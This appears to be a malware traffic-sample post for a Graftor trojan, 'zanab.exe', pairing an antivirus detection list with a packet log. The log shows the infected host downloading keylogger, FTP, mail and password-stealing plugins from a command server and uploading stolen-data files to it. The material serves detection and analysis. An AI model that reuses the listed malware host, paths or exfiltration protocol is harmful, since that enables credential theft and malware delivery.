Graftor Malware Trojan zanab.exe POST /poon/post.php www.gongotree.com Traffic Sample PCAP file Download

SHA256: 8fd5bcadd9ae6b1875024f1d5ca24a579727905f440600631ec972712f28c3f5
File name: zanab.exe
Detection ratio: 41 / 55
Analysis date: 2017-01-24 02:48:20 UTC ( 0 minutes ago )
ALYac Gen:Variant.Graftor.318298 20170123
AVG Luhe.Packed.C 20170123
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Graftor.318298 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fsysna.C1743112 20170123
Antiy-AVL Trojan/Win32.Fsysna 20170124
Arcabit Trojan.Graftor.D4DB5A 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) DR/Delphi.bsqgm 20170123
BitDefender Gen:Variant.Graftor.318298 20170124
CAT-QuickHeal (Suspicious) – DNAScan 20170123
Comodo TrojWare.Win32.Spy.Banker.Gen 20170124
CrowdStrike Falcon (ML) malicious_confidence_83% (W) 20161024
Cyren W32/SysVenFak.A.gen!Eldorado 20170124
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJNW 20170124
Emsisoft Gen:Variant.Graftor.318298 (B) 20170124
F-Prot W32/SysVenFak.A.gen!Eldorado 20170124

2017-01-23 21:08:29.692015 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [P.], seq 0:289, ack 1, win 259, length 289: HTTP: GET /utu/zanab.exe HTTP/1.1
E..I.p@….i…f…..J.P.c.;J.?lP…J…GET /utu/zanab.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:48.852699 IP 192.168.1.102.65517 > 75.75.75.75.53: 49466+ A? www.gongotree.com. (35)
E..?i…..x}…fKKKK…5.+:..:………..www    gongotree.com…..
2017-01-23 21:08:49.262241 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [S], seq 318064516, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….>…f…..K.P..G……. .c%…………..
2017-01-23 21:08:49.430597 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [.], ack 1051249154, win 259, length 0
E..(..@….I…f…..K.P..G.>…P….:……..
2017-01-23 21:08:49.431268 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 0:213, ack 1, win 259, length 213: HTTP: GET /poon/plugins/keylogger.p HTTP/1.1
E…..@….s…f…..K.P..G.>…P…….GET /poon/plugins/keylogger.p HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:53.294595 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 213:298, ack 32961, win 254, length 85: HTTP: GET /poon/plugins/ftp.p HTTP/1.1
E..}..@……..f…..K.P..HZ>.J.P….)..GET /poon/plugins/ftp.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:08:57.412231 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 0:371, ack 1, win 259, length 371: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]…(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”FTP-BCC017C5.txt”
Content-type: file

–Xu02=$–
2017-01-23 21:08:58.096953 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 394, win 257, length 0
E..(..@….#…f…..L.P]..T(…P….X……..
2017-01-23 21:09:01.107016 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 298:384, ack 49537, win 259, length 86: HTTP: GET /poon/plugins/mail.p HTTP/1.1
E..~..@……..f…..K.P..H.>…P….K..GET /poon/plugins/mail.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:05.220043 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 371:743, ack 394, win 257, length 372: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]..T(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 122
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”MAIL-BCC017C5.TxT”
Content-type: file

–Xu02=$–
2017-01-23 21:09:05.801224 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 787, win 256, length 0
E..(..@……..f…..L.P]…(..”P….\……..
2017-01-23 21:09:06.944920 IP 192.168.1.102.49725 > 75.75.75.75.53: 57531+ A? www.googleapis.com. (36)
E..@i…..xz…fKKKK.=.5.,.P………….www
googleapis.com…..
2017-01-23 21:09:08.751880 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 384:475, ack 106657, win 259, length 91: HTTP: GET /poon/plugins/passwords.p HTTP/1.1
E…..@……..f…..K.P..I.>.j.P…:^..GET /poon/plugins/passwords.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:14.342485 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 743:1113, ack 787, win 256, length 370: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E….:@….N…f…..L.P]…(..”P…0r..POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 120
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”PW-BCC017C5.LOG”
Content-type: file

–Xu02=$–
2017-01-23 21:09:16.475901 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 1180, win 254, length 0
E..(.;@……..f…..L.P]..:(…P….c……..
2017-01-23 21:09:20.641990 IP 192.168.1.102.59592 > 75.75.75.75.53: 8551+ A? oem.twimg.com. (31)
E..;i…..x{…fKKKK…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:20.641998 IP 192.168.1.102.64219 > 75.75.75.75.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..Ji…..xk…fKKKK…5.6x..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659012 IP 192.168.1.102.64219 > 75.75.76.76.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..JS……….fKKLL…5.6w..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659020 IP 192.168.1.102.59592 > 75.75.76.76.53: 8551+ A? oem.twimg.com. (31)
E..;S……….fKKLL…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:23.439161 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [.], ack 870606, win 1349, length 0
E..(.<@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:23.770262 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [F.], seq 289, ack 870606, win 1349, length 0
E..(.=@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:36.598111 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 1113:1263, ack 1180, win 254, length 150: HTTP: GET /poon/ HTTP/1.1
E….>@….&…f…..L.P]..:(…P…e_..GET /poon/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
Accept: */*
Host: www.gongotree.com
Connection: Keep-Alive